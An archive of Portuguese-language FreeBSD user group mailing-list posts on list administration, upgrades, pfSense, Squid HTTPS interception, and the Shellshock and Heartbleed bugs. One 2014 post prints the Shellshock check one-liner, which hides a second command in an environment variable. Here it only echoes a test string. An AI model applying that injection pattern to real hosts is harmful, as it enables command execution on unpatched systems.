Re: [FUG-BR] Quero sair da lista
Em seg., 10 de fev. de 2020 às 19:49, Gilberto F da Silva <2458...@gmail.com> escreveu: > > Histórico: http://www.fug.com.br/historico/html/freebsd/ > > Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd > > Há esse link para retirar o nome da inscrição porém, há > meses venho tentando e a página está sempre inacessível. > > Envia e-mail para freebsd-unsubscr...@fug.com.br ou acesse [1] (https não está funcionando), informe seu e-mail e clique em "Desinscrever". [1] http://www.fug.com.br/mailman/listinfo/freebsd Att., -- Welkson PGP Key ID: D092C683 - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] [OOF-TOPIC] Re: Lista
Em 19 de fevereiro de 2018 11:14, Fábio Rodrigues Ribeiro < lis...@farribeiro.com.br> escreveu: > Em 19-Feb-18 11:08, Welkson Renny de Medeiros escreveu: > >> Em 19 de fevereiro de 2018 10:58, Fábio Rodrigues Ribeiro < >> lis...@farribeiro.com.br> escreveu: >> >> E criaram... >>> >>> https://t.me/fug_br >>> >>> fu...@googlegroups.com >>> >>> Abraços. >>> >>> A ideia de grupos em WhatsApp e Telegram para discussões técnicas eu acho bem estranho. Participo de 2 grupos no Telegram, um de BSD (esse aí), e outro de Ceph... são MUITAS mensagens, sem histórico (ou histórico confuso), muito off-topic, etc... prefiro o old-school das listas, apesar de não ser "real-time" como o chat. Att., -- Welkson PGP Key ID: D092C683 - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] [OOF-TOPIC] Re: Lista
Em 19 de fevereiro de 2018 10:58, Fábio Rodrigues Ribeiro < lis...@farribeiro.com.br> escreveu: > E criaram... > > https://t.me/fug_br > > fu...@googlegroups.com > > Abraços. > Com o FUG de volta, creio não fazer sentido manter 2 listas (o histórico da lista FUG é bastante rico). O negócio é ficar por aqui, e tentar contribuir de alguma forma para que a lista continue de pé (auxiliar na manutenção dos servidores, auxílio financeiro para hospedagem da VM se for o caso, etc.). Att., -- Welkson PGP Key ID: D092C683 - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] Lista voltou à ativa?
Em 15 de fevereiro de 2018 10:46, Eduardo Schoedlerescreveu: > > > > > Acredito que ela nunca tenha parado, apenas diminuiram as perguntas ou o > > interesse no assunto :( > > Acredito que não, pois estou recebendo uma enxurrada de e-mails desde > essa noite. > > -- > Eduardo Schoedler > > Ficou parada por alguns meses. Problemas no mailman. Brandi explicou no grupo do Telegram. Vida longa ao FUG ;-) Att., -- Welkson PGP Key ID: D092C683 - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] Automação e gerenciamento de configuração no FreeBSD
Em 15 de fevereiro de 2018 02:08, Paulo Henriqueescreveu: > Em 15 de fev de 2018 01:56, "Adiel de Lima Ribeiro" < > adiel.netad...@gmail.com> escreveu: > > Bom dia, lista. > De minhas pesquisas eu ví que o Chef e o Puppet não são totalmente > compatíveis com o FreeBSD e não é possível executá-los sobre o FreeBSD. > Sendo assim, segue minha dúvida: > Qual ferramenta vocês utilizam para lidar com isso em seus parques de > servidores FreeBSD? > Obrigado. > > -- > Best regards; > Adiel de Lima Ribeiro > AWS Certified Solutions Architect > Specialist in Linux Network Administration > Microsoft Certified Systems Administrator > +55 (31) 98961-5984 > http://nuvym.com/ Ansible [1] e Fabric [2] creio que funcionam bem. [1] https://www.ansible.com/ [2] http://www.fabfile.org/ Att., -- Welkson PGP Key ID: D092C683 - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
[FUG-BR] Lista com problemas?
Amigos, FUG está com problemas? Outras colegas comentaram no MASOCH-L e decidi testar. -- Welkson PGP Key ID: D092C683 - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] Monitorar consumo do Link
Em 5 de maio de 2016 15:26, Enio Marconciniescreveu: > Olá boa tarde amigos. > Alguém recomenda um software que me permita, não só ver o consumo atual que > está passando no momento, mas o consumo total já trafegado, > algo parecido que o comando "systat -ifstat" mostra, porém que me permita > medir o que foi trafegado no dia, semanal ou mensal? > > Das ferramentas que eu conheço (cacti, mrtg, ntop, trafshow) não sei se > exibem essa informação ou essa possibilidade. > > Att > > O bandwidthd atenderia? http://bandwidthd.sourceforge.net/ Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] Gravação Palestra: Do meio do mato pro meio do BSD!
Em 3 de fevereiro de 2016 12:24, Jackescreveu: > Buenas! > > Se for isso, aqui: https://youtu.be/kQoCRp_Ac88?t=1773 > > []`s > Jack > > Que massa! Parabéns garga! Motivador sua história! Eu também vim do meio do mato (sertão do RN rsrs) e me identifiquei bastante com sua história (ler "man" impresso, entre outros). Abraços, -- Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] Sr. Moderador me tire da lista
Em 27 de março de 2015 15:20, Eduardo Schoedler lis...@esds.com.br escreveu: Em 27 de março de 2015 14:57, Ricardo Romero ricromer...@gmail.com escreveu: Já tentei várias vezes mas não consigo. A página da web em https://www.fug.com.br/mailman/listinfo/freebsd pode estar temporariamente indisponível ou pode ter sido movida permanentemente para um novo endereço da web. Código de erro: ERR_CONNECTION_CLOSED Acesse usando HTTP em vez de HTTPS: http://www.fug.com.br/mailman/listinfo/freebsd Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] Squid com https
Em 5 de março de 2015 18:18, MrBiTs mrbits@gmail.com escreveu: Se você configurar o squid direito (como me parece que fez) E (e esse é um grande E) colocar no mesmo .pem tanto a chave, o certificado e o certificado intermediário da Startcom, sim, tudo deve funcionar. Eu tenho certificados deles falando com Google, Facebook e outros serviços. Grande MrBiTs, beleza? Ajude-me a entender melhor essa solução. Você precisou instalar esse certificado no navegador das máquinas? Pelo que sei, a StarSSL não permite você gerar um certificado wildcard a nível de domínio, ex: *.* (sub-domínio acredito que deixa, ex: *. minhaempresa.com.br). PS: pelo que lembro no caso da Lenovo (Superfish) os caras instalavam um certificado wildcard no navegador do usuário. Ainda estou lendo sobre certificate pinning [1], mas pelo que vi ele associa o certificado ao host com uma chave que só o responsável pelo domínio teria acesso... o site até pode abrir em MITM, mas o navegador deveria gerar algum tipo de alerta (pelo menos no Chrome e Firefox) ou não? Se eu estiver engando, e se você puder, indique algum material para que eu possa entender melhor essa solução. [1] https://www.owasp.org/index.php/Certificate_and_Public_Key_Pinning Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] Squid com https
Em 5 de março de 2015 20:34, Welkson Renny de Medeiros welk...@gmail.com escreveu: Em 5 de março de 2015 18:18, MrBiTs mrbits@gmail.com escreveu: Se você configurar o squid direito (como me parece que fez) E (e esse é um grande E) colocar no mesmo .pem tanto a chave, o certificado e o certificado intermediário da Startcom, sim, tudo deve funcionar. Eu tenho certificados deles falando com Google, Facebook e outros serviços. Grande MrBiTs, beleza? Ajude-me a entender melhor essa solução. Você precisou instalar esse certificado no navegador das máquinas? Pelo que sei, a StarSSL não permite você gerar um certificado wildcard a nível de domínio, ex: *.* (sub-domínio acredito que deixa, ex: *. minhaempresa.com.br). PS: pelo que lembro no caso da Lenovo (Superfish) os caras instalavam um certificado wildcard no navegador do usuário. Ainda estou lendo sobre certificate pinning [1], mas pelo que vi ele associa o certificado ao host com uma chave que só o responsável pelo domínio teria acesso... o site até pode abrir em MITM, mas o navegador deveria gerar algum tipo de alerta (pelo menos no Chrome e Firefox) ou não? Se eu estiver engando, e se você puder, indique algum material para que eu possa entender melhor essa solução. [1] https://www.owasp.org/index.php/Certificate_and_Public_Key_Pinning Welkson Complemento para meu e-mail anterior: http://www.squid-cache.org/mail-archive/squid-users/201409/0002.html http://security.stackexchange.com/questions/52645/legitimate-use-case-of-man-in-the-middle-attack-for-dpi 4. Yep Certificate pinning will cause problems with this and is becoming more common as time goes by. The way this works is that the browser knows of a specific certificate or set of certificates that it trusts for a given hostname, and it won't base that trust on certificates being issued by a known CA. I'm not aware of a way past that problem. Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] Squid com https
Em 5 de março de 2015 13:04, MrBiTs mrbits@gmail.com escreveu: -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 On 03/05/2015 12:54 PM, Renata Dias wrote: Boa tarde a todos ! Fiz várias pesquisas no Google e também na FUG com relação a este assunto Squid com https. Gerei um certificado informal e consegui configurar meu Squid para filtrar os acessos na porta 443, porém ainda tenho problemas com o acesso ao Google. Posso está enganado, mas se não me engano Google usa certificate pinning, e você não vai conseguir acessar o serviço deles usando certificados auto-assinados. A saída é colocar uma exceção na regra do firewall para que a faixa de IP do Google não seja enviada para o proxy. Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] upgrade 8.4
Em 24 de fevereiro de 2015 15:20, Renato Botelho rbga...@gmail.com escreveu: Márcio, portupgrade é concorrente do portmaster e não do pkg. O pkg você vai acabar usando direta ou indiretamente. Na árvore de ports atual (seja no 8.4 ou no 10), quando você executa um ‘make install’ em um port, ele instala os arquivos dentro de PORTDIR/work/stage, cria um pacote binário .txz e instala esse pacote usando pkg, ou seja, o pkg *sempre* será usado. Tanto o portupgrade quanto o portmaster continuam funcionando do mesmo jeito que sempre funcionaram até onde eu sei, e eles servem pra atualizar ports compilando a partir do src usando a árvore do ports. O pkg também serve para instalar pacotes binários, nesse caso é bem mais rápido pois não compila local, mas, em contrapartida, é menos flexível, pois hoje são gerados pacotes apenas compilados com as OPTIONS default. Então eu diria que, se você vai usar todos os pacotes com OPTIONS default, vá de pkg com pacotes binários. Se você precisa selecionar OPTIONS não default, aí a escolha é sua, portupgrade (que eu já não uso há muitos anos e não sei como anda) ou portmaster. -- Renato Botelho Garga, outro dia estava pensando em abrir uma thread para perguntar exatamente pelas OPTIONS... maioria dos ports que instalo funcionam bem com options default, outros não (Squid por exemplo, onde preciso especificar qual proxy transparente pretendo usar, via pf, ipfw, etc.). Meu server está com FreeBSD 9.1-RELEASE, e o EoL já se foi desde de 12/2014... como está em uma máquina virtual, estou pensando em clonar e fazer testes de migração para uma versão mais atual. Att., -- Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] [FYI] Fwd: FreeBSD Now Available on DigitalOcean
2015-01-14 16:54 GMT-03:00 Fabricio Lima lis...@fabriciolima.com.br: So pra constar, caso precisem, na AWS da amazon suporta BSD 10.1 tb (desde nov/2012) https://aws.amazon.com/marketplace/pp/B00KSS55FY [ ]'s Fabricio Lima No caso da AWS, o problema é que o suporte não é oficial, e sim um port desenvolvido pelo Perciva: http://www.daemonology.net/freebsd-on-ec2/ Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
[FUG-BR] [FYI] Fwd: FreeBSD Now Available on DigitalOcean
Notícia excelente! Welkson -- Forwarded message -- From: Andrew Starr-Bochicchio ast...@digitalocean.com Date: 2015-01-14 15:01 GMT-03:00 Subject: FreeBSD Now Available on DigitalOcean To: freebsd-cl...@freebsd.org Hi all, I'm glad to be able to announce that FreeBSD 10.1 is now available for use on DigitalOcean. This has been one of the most requested features on our UserVoice page, so we're excited to finally bring it out. There's more information in this blog post by Neal Shrader, a member of our engineering team. [0] I'm subscribed to this list, and would love to hear any feedback you might have or answer any questions. [0] https://www.digitalocean.com/company/blog/presenting-freebsd-how-we-made-it-happen/ Thanks! - Andrew Starr-Bochicchio Community Manager DigitalOcean ᐧ ___ freebsd-cl...@freebsd.org mailing list https://lists.freebsd.org/mailman/listinfo/freebsd-cloud To unsubscribe, send any mail to freebsd-cloud-unsubscr...@freebsd.org -- Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] fork do pfSense
Em 6 de janeiro de 2015 09:12, Rafael Aquino raf...@lk6.com.br escreveu: Bom dia a todos... Eu não conhecia esta ferramenta, e como fã do PFSense prontamente instalei (agora a pouco) Bom, tem que ser um fork aprovado, pois instalação e todas as features são iguais... Gostei da skin, que é MUITO mais bonita... Mas até o momento senti falta de um recurso vital: o gerenciador de pacotes... E também da tradução para português. No mais, parece bem estável (de novo: são os mesmos recursos do pfsense em um FreeBSD 10.0 p15). Mas vou explorar mais e posto minhas impressões. Abraços!!! --- Rafael Mentz Aquino LK6 Soluções em TI Rafael, bom dia! Acho que só precisa de autorização se for usar o nome pfSense. Ou estou enganado? -- Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] [FYI] Security : OpenBSD x FreeBSD
Em 24 de dezembro de 2014 14:22, Fabricio Lima lis...@fabriciolima.com.br escreveu: eu voto no alvarenga!! [ ]'s Fabricio Lima When your hammer is C++, everything begins to look like a thumb. Pow pessoal, a intenção era discutir tecnicamente o assunto! Indiferente da linguagem do gueto, maloqueiro, culta, l33t, etc. ( vocês são demais); Obrigado pelas dicas Evandro. Bem que eksffa poderia nos brindar com a última aula de BSD de 2014 =) Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
[FUG-BR] [FYI] Security : OpenBSD x FreeBSD
Estava vendo o twitter ontem e me deparei com esse post: http://networkfilter.blogspot.com.br/2014/12/security-openbsd-vs-freebsd.html?m=1 No Reddit tem alguns comentários: http://www.reddit.com/r/netsec/comments/2ph03s/security_openbsd_vs_freebsd/ Ainda estou lendo o post... mas vejo com bons olhos esses comparativos, pois nos mostra onde estamos errando (se é que estamos, pois muitas das tecnologias apresentadas são novidades pra mim =). flames /dev/null -- Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] Servidor de música
Em 7 de dezembro de 2014 19:44, Thiago Gomes thiagome...@gmail.com escreveu: Galera, Gostaria de saber como implemento um servidor de música para uma loja. A empresa tem várias filiais ligada via fibra, ele deseja usando o Windows player ou até mesmo o browser fazer tocar essas músicas. Thiago. ICECast não ajudaria? Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
[FUG-BR] Ferramentas para análise de performance
Esse Brendan Greg trabalha na Netflix, e lá usa muito FreeBSD. No site dele tem vários slides legais sobre performance em *unix. No link abaixo tem as sugestões de ferramentas: Now with a BSD kernel :-) FreeBSD perf observ tools for @MeetBSDCA http://twitter.com/brendangregg/status/525707800584810496/photo/1 O site dele é esse: http://brendangregg.com Welkson PGP: D092C683 * usando smartphone - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
[FUG-BR] Falha no BASH (possível exploração remota)
Dia. Já testaram? welkson@fw ~ % env x='() { :;}; echo vulnerable' bash -c echo this is a test vulnerable this is a test Mais detalhes: http://portaudit.freebsd.org/71ad81da-4414-11e4-a33e-3c970e169bc2.html https://access.redhat.com/articles/1200223 https://marc.info/?l=oss-securitym=141157106132018w=2 Migrei a pouco tempo para o pkg, e estou apanhando quando tento atualizar com pkg install bash, o treco me oferece atualização de um monte de PHP antigo (estou usando 5.5 instalado via /usr/ports/lang/php55* e o pkg me oferece atualização para o 54, ou seja, mais velho). Preciso parar e entender esse tal pkg =) -- Welkson PGP: D092C683 - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] Erro sonewconn
Em 27 de agosto de 2014 16:29, Jorge Petry - BSD jo...@bsd.com.br escreveu: Em 26/08/2014 15:33, Luiz Otavio O Souza escreveu: On 26 August 2014 10:55, Jorge Petry - BSD wrote: Bom dia pessoal. Alguém ja passou por esse tipo de erro? Estão aparecendo nos logs e dmesg. Possuo 02 Servers com Freebsd 10-RELEASE rodando jails e aparece nos 2. sonewconn: pcb 0xf80265003dc8: Listen queue overflow: 151 already in queue awaiting acceptance sonewconn: pcb 0xf80177664188: Listen queue overflow: 8 already in queue Uma curiosidade... você aplicou essa regra no sysctl do host ou do jail? Como jail é um ambiente isolado, provavelmente tem seu próprio sysctl. Fazendo uma analogia com virtualização, o que quero saber é se você aplicou o sysctl no HOST ou no GUEST. Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] upgrade 9.0 - 10.0
Em 7 de agosto de 2014 14:32, Paulo Henrique - BSDs Brasil paulo.rd...@bsd.com.br escreveu: Atualizei a minha estação de trabalho no final de semana da versão 9.2 para a 10 STABLE e não tive nenhum problema no processo, contudo ja havia migrado para o pkg antes da atualização. Os passos foram os seguintes : Atualizar o subversion Remover o /usr/src Paulo, estou com uma dúvida, você removeu o /usr/src e já fez o make buildworld? Não tem um svn checkout antes desse make buildworld? make buildworld ( é requerimento para qualquer troca de major release) make buildkernel KERNCONF=MYKERNEL make installkernel KERNCONF=MYKERNEL mergemaster -iFp reboot make installworld mergemaster -Fp reboot make delete-old-lib make delete-old-dir reboot Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] upgrade 9.0 - 10.0
Em 4 de agosto de 2014 14:24, Edinilson - ATINET edinil...@atinet.com.br escreveu: Eu sempre utilizo os metodos descritos aqui: http://www.bsdnow.tv/tutorials/stable-current E, na parte do kernel, dificilmente tenho maiores problemas. O que SEMPRE tenho problemas sao com os ports. O perl e suas bibliotecas é um bom exemplo. Do 9 para o 9.3 eu tive problemas TAMBEM com o smokeping, esteja preparado. Edinilson Excelente link Edinilson. Obrigado! Esse BSD que pretendo atualizar fica um pouco distante, estava pensando em fazer remotamente (coragem está pouca :p). O bom é que esse BSD está virtualizado (ESXi 5.1), posso fazer um snapshot antes de tentar atualizar, e qualquer bronca dar um revert. Abraços, Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] [OFF - Pfsense] Vouchers Captivel Portal
Em 4 de agosto de 2014 15:47, Deny Santos deny.san...@gmail.com escreveu: Boa tarde , gostaria de ver se alguém conhece alguma forma de gerar os vouchers do pfsense sem ter que logar nele com usuario administrador , pergunto pois preciso que uma recepcionista fique gerando os tickets, ja vi o FreeRadius que tem como fazer também pois ele salvaria a base dele no mysql e depois eu pegaria com um php tranquilamente . Alguma sugestão ? Obrigado Um amigo tempos atrás me fez essa pergunta, fiz algumas pesquisas rápidas e encontrei isso: http://www.pfsensevp.portalavis.net/ https://github.com/vatesfr/selkie https://github.com/jpardobl/pfsense_vouchers_rest Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] upgrade 9.0 - 10.0
Em 30 de julho de 2014 08:41, Marcelo da Silva marc...@mginformatica.com escreveu: bom dia. tenho uma instalacao com versao 9.0 do FreeBSD gostaria de fazer upgrade para versao 10 . a instalacao é simples, so mysql55 php e apache. qual o procedimento correto ? principalmente que agora usa svn e eu ainda do meio confuso com isso . Considerando o EoL estou pensando em migrar meu 9 para 9.3: http://www.freebsd.org/security/ Sua pergunta foi bem pertinente Marcelo. Apesar de gostar (e usar) bastante o Google, existe várias formas de atualizar o BSD (svn, freebsd-update, etc.), e não custa pedir opinião aos amigos mais experientes. O meu tem bastante serviço rodando (sei que não é uma boa prática)... estou criando coragem de fazer o upgrade =) Att., -- Welkson PGP: D092C683 - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] [Off-Topic] - Lista/Site de registro de malwares
Em 16 de julho de 2014 14:29, Ricardo Tweeg rtw...@yahoo.com.br escreveu: Boa tarde a todos, Desde já peço desculpas pelo assunto ser off-topic. Gostaria de saber se alguém da lista poderia me indicar algumas listas/sites gratuitos de registros de malwares. Seria a mesma coisa que temos hoje em dia com os spamns, onde listas/sites registram os emails, domínios e Ip´s que fazem spamns. No momento só encontrei as listas/sites cobertos pelo site www.abuse.ch. Caso conheçam mais alguns que fosse de qualidade e free, ficaria grato pela ajuda. Abraços Tempos atrás usei essa: http://www.malware.com.br/ Não sei se continua sendo atualizada. Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] [OFFTOPIC] Indicação de colocation
Em 26 de maio de 2014 13:10, Celso Viana celso.via...@gmail.com escreveu: Tem que ser BSD? Se sim, o rootbsd.com parece bom. Amazon AWS tem BSD (FreeBSD)? -- Celso Vianna BSD User: 51318 http://www.bsdcounter.org Oficialmente não. Mas algumas pessoas usam as imagens que o Perciva disponibiliza: http://www.daemonology.net/freebsd-on-ec2/ O tarsnap.com usa FreeBSD e está hospedado na Amazon. Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] Fwd: [GTER] pfSense - not open source anymore
Em 22 de maio de 2014 11:04, Christopher Giese bs...@bsdux.com.brescreveu: Em 22/05/2014 10:50, Renato Botelho escreveu: 2014-05-22 10:40 GMT-03:00 Lucas Dias lucas...@gmail.com: Em 22 de maio de 2014 10:13, Nicolas Wildner nico...@tbl.com.br escreveu: O problema é o seguinte 1 - pfSense é uma marca registrada da Electric Sheep Fencing. 2 - As pessoas começaram a fazer forks do projeto, sem ao menos ter a decência de mudar o nome do fork com relação ao original 3 - pfSense remove suas ferramentas de buildar pfSense 4 - Lançam a informação de que haverá uma versão comercial e outra community(não sei se opensource ou freeware) Em mais de um post vi o pessoal comentando que o FreeBSD também terá um CLA [1], parecido com o pfSense [2]: [1] https://forum.pfsense.org/index.php?topic=77038.0(You should probably be aware that a CLA is coming to FreeBSD as well.) [2] https://portal.pfsense.org/members/signup/ICLA Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
[FUG-BR] [FYI] Fwd: De Raadt + FBSD + OpenSSH + hole?
Pessoal, Desculpe-me pela pergunta newbie, mas o OpenSSH que o FreeBSD usa não é o MESMO do OpenBSD? Ou o FreeBSD fez algum tipo de fork? . as long as you aren't using FreeBSD or a derivative (hint: Jupiper), you are fine. That's the only place I know of an OpenSSH hole. flames /dev/null (saudoso Irado =) Welkson -- Forwarded message -- From: Todor Todorov todo...@paladin.bulgarpress.com Date: 2014-04-13 19:38 GMT-03:00 Subject: De Raadt + FBSD + OpenSSH + hole? To: freebsd-secur...@freebsd.org Hi everyone, I came across this : https://groups.google.com/forum/#!topic/mailing.openbsd.tech/xALfxxR3oKo You are welcome. Stuart Henderson wrote the draft, but he forgot that part, and Damien Miller and I realized it was needed. We sensed there might be some ambiguity... we'll take care the next time an OpenOffice problem also. ... as long as you aren't using FreeBSD or a derivative (hint: Jupiper), you are fine. That's the only place I know of an OpenSSH hole. Oh now I sense some angst. Please ask Kirk McKusick, he knows the story about why this is not being disclosed to FreeBSD. Sometimes I feel a bit sorry for them (and for him), but then the next minute I don't feel sorry because there's damn good reasons they won't be told about what I found. Does that answer help? Hope so. Any guidance here? ___ freebsd-secur...@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-security To unsubscribe, send any mail to freebsd-security-unsubscr...@freebsd.org - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] [FYI] Fwd: De Raadt + FBSD + OpenSSH + hole?
Em 15 de abril de 2014 13:17, Patrick Tracanelli eks...@freebsdbrasil.com.br escreveu: On 15/04/2014, at 12:18, Renato Botelho rbga...@gmail.com wrote: On Ter, 2014-04-15 at 11:50 -0300, Welkson Renny de Medeiros wrote: Pessoal, Desculpe-me pela pergunta newbie, mas o OpenSSH que o FreeBSD usa não é o MESMO do OpenBSD? Ou o FreeBSD fez algum tipo de fork? . as long as you aren't using FreeBSD or a derivative (hint: Jupiper), you are fine. That's the only place I know of an OpenSSH hole. flames /dev/null (saudoso Irado =) Sim, é o mesmo. O Theo Deraadt gosta de ser polêmico (no mesmo estilo do linus torvalds). O alvo da vez é o FreeBSD e a IETF (que não de um número de protocolo pro CARP e fez ele ficar bravinho). :) Se eu fosse você nem esquentava a cabeça com as coisas que ele fala, amanhã ele acorda irritado com o linux e muda o foco novamente. Olha e pelo pouco que se conhece do Theo, o FreeBSD vai entrar de novo na mira dele por causa do CARP no FreeBSD 10, que ficou tão “melhor” que o DfBSD está dispensando o carp existente pra usar o do FreeBSD; os caras do uCARP (que são dev OpenBSD) estão estudando se da pra fazer o ficar tão inerente a interface física como ficou no FreeBSD de forma portável. [crop] Eksffa e Garga, obrigado por mais essa aula =) Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] [OFF-Topic] So long and thanks for all the fish
Em 14 de abril de 2014 11:48, Daniel Bristot de Oliveira danielbris...@gmail.com escreveu: Opa! Hoje tirei um tempo para limpar meus e-mails e vi que a muito tempo não participo da FUG, então acho justo sair do grupo. É a vida, a um tempo atrás resolvi migrar de plataforma por motivos profissionais e hoje aqui estou, longe do mundo FreeBSD... estou trabalhando em uma bem conhecida empresa norte americana de Linux Enterprise. Gostaria apenas de agradecer formalmente à FUG e todos os seus membros, principalmente os que aqui estavam entre os anos de 2005 à 2009, por todo o conhecimento, oportunidades e amigos que ganhei/tive/fiz por aqui. Até logo, e obrigado por todos os peixes! -- Daniel Bristot de Oliveira Valeu professor! Boa sorte nessa nova empreitada. Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] [Fwd: [FreeBSD-Announce] HEADSUP! OpenSSL Heartbleed bug]
Em 10 de abril de 2014 12:57, Enrique Fynn enriquef...@gmail.com escreveu: Atenção especial aos servidores rodando FreeBSD, foram os únicos que um atacante conseguiu extrair a chave privada do ssl pelo bug. A fonte não é das mais confiáveis (Twitter) [0], mas não vejo razão para que não seja verdadeira. Já vi que em sistemas linux ninguém conseguiu de fato extrair a chave [1], no freeBSD a chave deve ficar na memória que vaza com o bug mais frequentemente =/ [0] https://twitter.com/1njected/status/453781230593769472 [1] http://blog.existentialize.com/diagnosis-of-the-openssl-heartbleed-bug.html Peace; Fynn. Fynn, Pelo que li sobre esse teste feito pelo 1njected, assim que ele inicou o serviço já fez o teste via ssltest.py, ou seja, não tinha muita coisa na memória além da chave privada. Eu acredito que se repetir o teste em qualquer outro SO com openssl vulnerável nas mesmas condições ocorrerá o mesmo problema. Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] [Fwd: [FreeBSD-Announce] HEADSUP! OpenSSL Heartbleed bug]
Em 10 de abril de 2014 13:36, Welkson Renny de Medeiros welk...@gmail.comescreveu: Em 10 de abril de 2014 12:57, Enrique Fynn enriquef...@gmail.comescreveu: Atenção especial aos servidores rodando FreeBSD, foram os únicos que um atacante conseguiu extrair a chave privada do ssl pelo bug. A fonte não é das mais confiáveis (Twitter) [0], mas não vejo razão para que não seja verdadeira. Já vi que em sistemas linux ninguém conseguiu de fato extrair a chave [1], no freeBSD a chave deve ficar na memória que vaza com o bug mais frequentemente =/ [0] https://twitter.com/1njected/status/453781230593769472 [1] http://blog.existentialize.com/diagnosis-of-the-openssl-heartbleed-bug.html Peace; Fynn. Aproveitando o gancho, lembrei do pfSense que usa HTTPS no WebGUI... No fórum internacional do pfSense a galera está dizendo que várias versões do pfSense estão vulneráveis... eu testei alguns usando esse site [1], e o resultado me mostra o contrário. Acredito que o openssl do pfSense apesar de ser um build vulnerável, foi compilado sem heartbleed. Alguém confirma? [1] http://rehmann.co/projects/heartbeat/ Welkson - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] [Fwd: [FreeBSD-Announce] HEADSUP! OpenSSL Heartbleed bug]
